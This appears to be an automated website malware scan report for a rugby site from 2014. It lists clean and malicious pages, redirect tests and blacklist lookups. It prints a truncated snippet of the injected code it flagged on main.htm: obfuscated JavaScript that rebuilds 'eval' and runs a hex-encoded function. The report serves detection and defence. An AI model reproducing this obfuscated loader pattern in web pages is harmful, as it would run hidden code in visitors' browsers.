Scanned pages/files
Request | Server response | Status |
http://rugbymai.ru/ | 200 OK Content-Length: 41479 Content-Type: text/html | clean |
http://rugbymai.ru/sponsor/comcor1.htm | 200 OK Content-Length: 1288 Content-Type: text/html | clean |
http://rugbymai.ru/sponsor/../main.htm | 200 OK Content-Length: 51301 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
var jQuery=window['e.vTa.l['.replace(/[4\.T\[w]/g, '')]('ezvUa&l<'.replace(/[US\<&z]/g, '')); jQuery('\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x7a\x6e\x54\x66\x62\x28\x66\x63\x30\x41\x48\x29\x7b\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x79\x46\x4d\x67\x28\x74\x75\x59\x41\x51\x55\x52\x29\x7b\x76\x61\x72\x20\x67\x49\x51\x49\x4a\x3d\x30\x3b\x76\x61\x72\x20\x6c\x73\x46\x77\x30\x46\x3d\x74\x75\x59\x41\x51\x55\x52\x2e\x6c\x65\x6e\x67\x74\x68\x2c\x20\x67\x59\x50\x36\x7a\x3d\x30\x3b\x77\x68\x69\x6c
Antivirus reports:
http://rugbymai.ru/sponsor/../sponsor/comcor1.htm | 200 OK Content-Length: 1288 Content-Type: text/html | clean |
http://rugbymai.ru/sponsor/../sponsor/../main.htm | 200 OK Content-Length: 51301 Content-Type: text/html | malicious |
http://rugbymai.ru/sponsor/../sponsor/../sponsor/comcor1.htm | 200 OK Content-Length: 1288 Content-Type: text/html | clean |
http://rugbymai.ru/sponsor/../sponsor/../sponsor/../main.htm | 200 OK Content-Length: 51301 Content-Type: text/html | malicious |
http://rugbymai.ru/sponsor/../sponsor/../sponsor/../sponsor/comcor1.htm | 200 OK Content-Length: 1288 Content-Type: text/html | clean |
http://rugbymai.ru/sponsor/../sponsor/../sponsor/../sponsor/../main.htm | 200 OK Content-Length: 51301 Content-Type: text/html | malicious |
http://rugbymai.ru/sponsor/../sponsor/../sponsor/../sponsor/../sponsor/comcor1.htm | 200 OK Content-Length: 1288 Content-Type: text/html | clean |
http://rugbymai.ru/sponsor/../sponsor/../sponsor/../sponsor/../sponsor/../main.htm | 200 OK Content-Length: 51301 Content-Type: text/html | malicious |
http://rugbymai.ru/sponsor/../sponsor/../sponsor/../sponsor/../sponsor/../sponsor/comcor1.htm | 200 OK Content-Length: 1288 Content-Type: text/html | clean |
http://rugbymai.ru/sponsor/../sponsor/../sponsor/../sponsor/../sponsor/../sponsor/../main.htm | 200 OK Content-Length: 51301 Content-Type: text/html | malicious |
http://rugbymai.ru/sponsor/../sponsor/../sponsor/../sponsor/../sponsor/../sponsor/../sponsor/comcor1.htm | 200 OK Content-Length: 1288 Content-Type: text/html | clean |
http://rugbymai.ru/sponsor/../sponsor/../sponsor/../sponsor/../sponsor/../sponsor/../sponsor/../main.htm | 200 OK Content-Length: 51301 Content-Type: text/html | malicious |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: rugbymai.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 27 Apr 2014 16:55:13 GMT
Accept-Ranges: bytes
ETag: "13258ea-a207-487aa0b9ef700"
Server: nginx
Vary: Accept-Encoding
Content-Length: 41479
Content-Type: text/html
Last-Modified: Fri, 28 May 2010 16:31:56 GMT
...41479 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: rugbymai.ru
Referer: http://www.google.com/search?q=rugbymai.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=rugbymai.ru
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://rugbymai.ru/
Result: rugbymai.ru is not infected or malware details are not published yet.